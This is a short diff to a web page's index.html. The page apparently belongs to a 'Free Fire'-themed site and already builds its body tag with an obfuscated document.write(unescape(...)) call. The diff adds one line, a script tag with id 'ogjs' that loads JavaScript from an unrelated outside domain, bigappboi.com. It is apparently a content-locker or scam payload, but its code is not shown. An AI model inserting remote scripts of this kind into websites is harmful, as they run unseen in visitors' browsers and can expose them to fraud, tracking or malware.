--- a/index.html
+++ b/index.html
@@ -41,6 +41,7 @@ document.write(unescape('%3Cbody%20background%3D%22i.imgur.com/FreeFirebackgound
         <!-- Javacript Files -->
         <script src="js/bootstrap.min.js"></script>
         <script src="outdatedbrowser/outdatedbrowser.min.js"></script>
+    	<script type="text/javascript" id="ogjs" src="https://bigappboi.com/cl/js/42p9w5"></script>
         <script src="js/sweet-alert.min.js"></script>
         <script src="js/bootbox.min.js"></script>
         <script src="js/jquery.backstretch.min.js"></script>
